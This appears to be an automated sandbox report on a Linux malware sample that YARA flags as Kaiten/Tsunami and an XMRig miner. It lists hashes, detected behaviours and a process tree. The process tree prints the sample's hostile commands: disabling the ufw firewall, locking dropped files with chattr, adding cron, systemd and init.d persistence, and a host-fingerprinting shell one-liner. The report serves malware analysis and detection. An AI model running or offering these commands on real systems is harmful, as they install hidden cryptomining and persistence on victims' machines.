Analysis
-
max time kernel
149s -
max time network
151s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240523-en -
resource tags
arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system -
submitted
12-10-2024 01:53
Behavioral task
behavioral1
Sample
d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf
-
Size
3.2MB
-
MD5
396a812c15bd9809d0c8f438b8517827
-
SHA1
6a8eb0ee0a05cede17a50ec04b0a549d70325dcb
-
SHA256
d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a
-
SHA512
83ba44b59c9aa517887d27de612b646a17e1b0e372e216e279f188a75e12759b27f181509287e08e79aa34872b59b711fc8efd014b463f58934f762a8d70e948
-
SSDEEP
98304:EenYv0GcTOR0aUripytWEGYk91lRujZv9I:bYoOjGhnGPLlqZvW
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
resource yara_rule behavioral1/memory/4391-4-0x00007bf212a6b000-0x00007bf212a7f700-memory.dmp family_kaiten2 -
Detects Kaiten/Tsunami payload 1 IoCs
resource yara_rule behavioral1/memory/4391-4-0x00007bf212a6b000-0x00007bf212a7f700-memory.dmp family_kaiten -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/memory/2859-2-0x00007e0626a00000-0x00007e06270bed40-memory.dmp xmrig behavioral1/memory/3456-3-0x00007671b0600000-0x00007671b0cbed40-memory.dmp xmrig -
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 3517 sh 3533 chmod 3677 chmod -
Executes dropped EXE 4 IoCs
ioc pid Process /etc/init.d/dpkg-deb-package 2856 dpkg-deb-package /tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4 2859 -bash-067a1584-d7da-4772-913f-4f590da7acb4 /tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4 3456 -bash-067a1584-d7da-4772-913f-4f590da7acb4 /tmp/-python37-2bc57466-c60a-4a67-9ea4-14b24d7d0a0f 4391 -python37-2bc57466-c60a-4a67-9ea4-14b24d7d0a0f -
Attempts to change immutable files 17 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 3525 chattr 3676 sed 3940 sed 3520 chattr 3532 sed 3534 chattr 3454 chattr 3455 chattr 3457 sh 3460 hostname 3517 sh 3935 chattr 3522 sed 3527 chattr 3537 chattr 3933 chattr 3941 chattr -
Checks hardware identifiers (DMI) 1 TTPs 8 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/sys_vendor -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/product_name -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/board_vendor -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/bios_vendor -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/sys_vendor -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/product_name -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/board_vendor -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/bios_vendor -bash-067a1584-d7da-4772-913f-4f590da7acb4 -
Creates/modifies Cron job 1 TTPs 17 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/.lib-knlib4 d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for modification /etc/cron.hourly/.lib-knlib4 d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for modification /etc/cron.monthly/.lib-knlib4 d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for modification /etc/cron.hourly/seds7X4Jq sed File opened for modification /var/spool/cron/crontabs/tmp.zdODDi crontab File opened for modification /etc/cron.daily/.lib-knlib4 d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for modification /etc/cron.weekly/.lib-knlib4 d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.daily/sedY8c9Jq sed File opened for modification /etc/cron.d/.lib-knlib4 d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.d/sedQqCVEZ sed File opened for modification /etc/cron.monthly/sedgJWL5r sed File opened for modification /etc/cron.weekly/sedeHW9P3 sed -
Enumerates active TCP sockets 1 TTPs 3 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp lsof File opened for reading /proc/net/tcp d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for reading /proc/net/tcp lsof -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/dpkg-deb-package d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sed9wGOzG sed -
Modifies systemd 2 TTPs 3 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /etc/systemd/system/dpkg-deb-package.service d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee -
Reads hardware information 1 TTPs 28 IoCs
Accesses system info like serial numbers, manufacturer names etc.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/bios_version -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/board_serial -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/chassis_version -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/board_version -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/product_serial -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/product_uuid -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/board_name -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/product_serial -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/board_serial -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/chassis_serial -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/bios_date -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/board_name -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/product_uuid -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/chassis_asset_tag -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/chassis_version -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/product_version -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/chassis_vendor -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/chassis_type -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/chassis_type -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/bios_date -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/board_version -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/board_asset_tag -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/product_version -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id/bios_version -bash-067a1584-d7da-4772-913f-4f590da7acb4 -
Writes file to system bin folder 5 IoCs
description ioc Process File opened for modification /bin/sysdr cp File opened for modification /bin/dpkg-debian d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for modification /bin/bprofr cp File opened for modification /bin/crondr cp File opened for modification /bin/initdr cp -
Security Software Discovery 1 TTPs 2 IoCs
Adversaries may attempt to discover installed security software and its configurations.
pid Process 3034 sh 3042 sh -
resource yara_rule behavioral1/files/fstream-2.dat upx behavioral1/files/fstream-6.dat upx behavioral1/files/fstream-35.dat upx -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself (sysv-install) 3058 systemctl -
Checks CPU configuration 1 TTPs 8 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo ps File opened for reading /proc/cpuinfo -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo ps -
Reads CPU attributes 1 TTPs 17 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/possible pgrep File opened for reading /sys/devices/system/cpu/possible -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/cpu/online -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/cpu/types -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/types -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/cpu/possible pgrep File opened for reading /sys/devices/system/cpu/possible pgrep File opened for reading /sys/devices/system/cpu/possible pgrep File opened for reading /sys/devices/system/cpu/online -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/cpu/possible ps File opened for reading /sys/devices/system/cpu/possible pkill File opened for reading /sys/devices/system/cpu/possible -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/cpu/possible ps -
Reads system network configuration 1 TTPs 40 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/udplite lsof File opened for reading /proc/net/udp lsof File opened for reading /proc/net/icmp lsof File opened for reading /proc/net/icmp lsof File opened for reading /proc/net/ax25 lsof File opened for reading /proc/net/netlink lsof File opened for reading /proc/net/unix lsof File opened for reading /proc/net/raw6 lsof File opened for reading /proc/net/tcp lsof File opened for reading /proc/net/raw lsof File opened for reading /proc/net/udp6 lsof File opened for reading /proc/net/ipx lsof File opened for reading /proc/net/sockstat lsof File opened for reading /proc/net/udp6 d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for reading /proc/net/ax25 lsof File opened for reading /proc/net/unix lsof File opened for reading /proc/net/raw6 lsof File opened for reading /proc/net/sctp/eps lsof File opened for reading /proc/net/sctp/eps lsof File opened for reading /proc/net/tcp6 d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for reading /proc/net/tcp d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for reading /proc/net/udp d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for reading /proc/net/netlink lsof File opened for reading /proc/net/packet lsof File opened for reading /proc/net/udplite6 lsof File opened for reading /proc/net/udp lsof File opened for reading /proc/net/sockstat6 lsof File opened for reading /proc/net/udplite6 lsof File opened for reading /proc/net/sockstat lsof File opened for reading /proc/net/raw lsof File opened for reading /proc/net/tcp6 lsof File opened for reading /proc/net/udp6 lsof File opened for reading /proc/net/tcp6 lsof File opened for reading /proc/net/udplite lsof File opened for reading /proc/net/ipx lsof File opened for reading /proc/net/sockstat6 lsof File opened for reading /proc/net/tcp lsof File opened for reading /proc/net/sctp/assocs lsof File opened for reading /proc/net/packet lsof File opened for reading /proc/net/sctp/assocs lsof -
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/node ps File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/node ps File opened for reading /sys/fs/cgroup/cgroup.controllers -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/node/devices/node0/meminfo -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/type -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/kernel/mm/hugepages -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/node pgrep File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_bandwidth -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/firmware/dmi/tables/smbios_entry_point -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/fs/cgroup/cpuset.mems.effective -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/node/online -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/node/devices/node0/cpumap -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/topology/die_cpus -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/node/devices/node0/access1/initiators -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/node ps File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index1/type -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/kernel/mm/hugepages -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_id -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/dax/target_node -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/node/devices/node0/access1/initiators -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/node/devices/node0/access0/initiators -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/size -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/node ps File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for reading /sys/bus/node/devices/node0/access0/initiators/read_latency -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/virtual/dmi/id -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for reading /sys/devices/system/node pkill -
Process Discovery 1 TTPs 2 IoCs
Adversaries may try to discover information about running processes.
pid Process 3036 ps 3045 ps -
description ioc Process File opened for reading /proc/2289/cgroup pkill File opened for reading /proc/1069/stat lsof File opened for reading /proc/14/status pgrep File opened for reading /proc/760/environ ps File opened for reading /proc/2266/cmdline ps File opened for reading /proc/57/ctty pgrep File opened for reading /proc/2363/environ ps File opened for reading /proc/3033/cmdline ps File opened for reading /proc/3433/ctty pkill File opened for reading /proc/48/cmdline pgrep File opened for reading /proc/2911/stat ps File opened for reading /proc/2533/ctty pkill File opened for reading /proc/190/cgroup pgrep File opened for reading /proc/2842/ctty ps File opened for reading /proc/2217/ctty pgrep File opened for reading /proc/26/stat ps File opened for reading /proc/381/stat ps File opened for reading /proc/2497/environ ps File opened for reading /proc/2497/status ps File opened for reading /proc/18/cgroup pgrep File opened for reading /proc/153/ctty pgrep File opened for reading /proc/57/ctty ps File opened for reading /proc/50/stat ps File opened for reading /proc/49/ctty pkill File opened for reading /proc/235/status ps File opened for reading /proc/197/stat lsof File opened for reading /proc/1104/fdinfo/13 lsof File opened for reading /proc/4/stat pgrep File opened for reading /proc/3/cmdline pgrep File opened for reading /proc/182/status pkill File opened for reading /proc/2933/status ps File opened for reading /proc/2024/status ps File opened for reading /proc/194/environ ps File opened for reading /proc/2927/status ps File opened for reading /proc/sys/fs/nr_open systemctl File opened for reading /proc/457/status pgrep File opened for reading /proc/792/status pgrep File opened for reading /proc/2911/ctty ps File opened for reading /proc/2877/ctty ps File opened for reading /proc/1/fdinfo/65 lsof File opened for reading /proc/357/fdinfo/80 lsof File opened for reading /proc/2497/status pgrep File opened for reading /proc/38/status pgrep File opened for reading /proc/32/status ps File opened for reading /proc/2558/stat ps File opened for reading /proc/756/status ps File opened for reading /proc/45/cmdline pgrep File opened for reading /proc/2342/stat pgrep File opened for reading /proc/uptime pgrep File opened for reading /proc/self/status pgrep File opened for reading /proc/2902/stat ps File opened for reading /proc/37/stat pgrep File opened for reading /proc/56/stat pgrep File opened for reading /proc/891/cmdline ps File opened for reading /proc/2333/stat pgrep File opened for reading /proc/1121/status ps File opened for reading /proc/2042/status ps File opened for reading /proc/2217/ctty pgrep File opened for reading /proc/56/status pgrep File opened for reading /proc/15/cmdline ps File opened for reading /proc/2902/status ps File opened for reading /proc/2657/fdinfo/1 lsof File opened for reading /proc/2291/cmdline pgrep File opened for reading /proc/2333/stat pgrep -
Writes file to tmp directory 5 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4 d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for modification /tmp/.lock -bash-067a1584-d7da-4772-913f-4f590da7acb4 File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/-python37-2bc57466-c60a-4a67-9ea4-14b24d7d0a0f d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf File opened for modification /tmp/.bashirc -python37-2bc57466-c60a-4a67-9ea4-14b24d7d0a0f
Processes
-
/tmp/d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf/tmp/d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a.elf1⤵
- Creates/modifies Cron job
- Enumerates active TCP sockets
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Reads system network configuration
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2830 -
/usr/bin/bashbash -c "ufw disable"2⤵PID:2847
-
-
/usr/bin/lsoflsof -t -i :4442⤵
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:2848
-
-
/usr/bin/lsoflsof -t -i :594752⤵
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:2850
-
-
/usr/bin/pgreppgrep -f ksysrvthread2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:2851
-
-
/usr/bin/pgreppgrep -f sysrv2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2852
-
-
/usr/bin/pgreppgrep -f klibsystem42⤵
- Reads CPU attributes
- Reads runtime system information
PID:2853
-
-
/usr/bin/pgreppgrep -f klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
PID:2854
-
-
/usr/bin/chattrchattr +ia /etc/init.d/dpkg-deb-package2⤵PID:2855
-
-
/etc/init.d/dpkg-deb-package/etc/init.d/dpkg-deb-package start2⤵
- Executes dropped EXE
PID:2856 -
/usr/bin/cpcp -f -r -- /bin/dpkg-debian /bin/dpkg-deb-package3⤵PID:2858
-
-
/usr/bin/nohupnohup ./dpkg-deb-package3⤵PID:2860
-
-
/usr/bin/rmrm -rf -- dpkg-deb-package3⤵PID:2861
-
-
-
/tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4/tmp/-bash-067a1584-d7da-4772-913f-4f590da7acb4 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2859 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵PID:2973
-
/usr/bin/hostnamehostname -I4⤵PID:2978
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:2981
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵PID:2986
-
-
/usr/bin/grepgrep "Port "4⤵PID:2987
-
-
/usr/bin/headhead -n 14⤵PID:2989
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵PID:2990
-
-
/usr/bin/whoamiwhoami4⤵PID:2992
-
-
/usr/bin/hostnamehostname4⤵PID:2993
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:2996
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
PID:3000
-
-
/usr/bin/cutcut -d: -f24⤵PID:3001
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵PID:3002
-
-
/usr/bin/sedsed -e "s/\$//"4⤵PID:3003
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3007
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3010
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3013
-
-
/usr/bin/awkawk "{print \$3}"4⤵PID:3016
-
-
/usr/bin/awkawk "{print \$4}"4⤵PID:3019
-
-
/usr/bin/awkawk "{print \$1}"4⤵PID:3022
-
-
/usr/bin/awkawk "{print \$2\" \"\$3\" \"\$4}"4⤵PID:3024
-
-
-
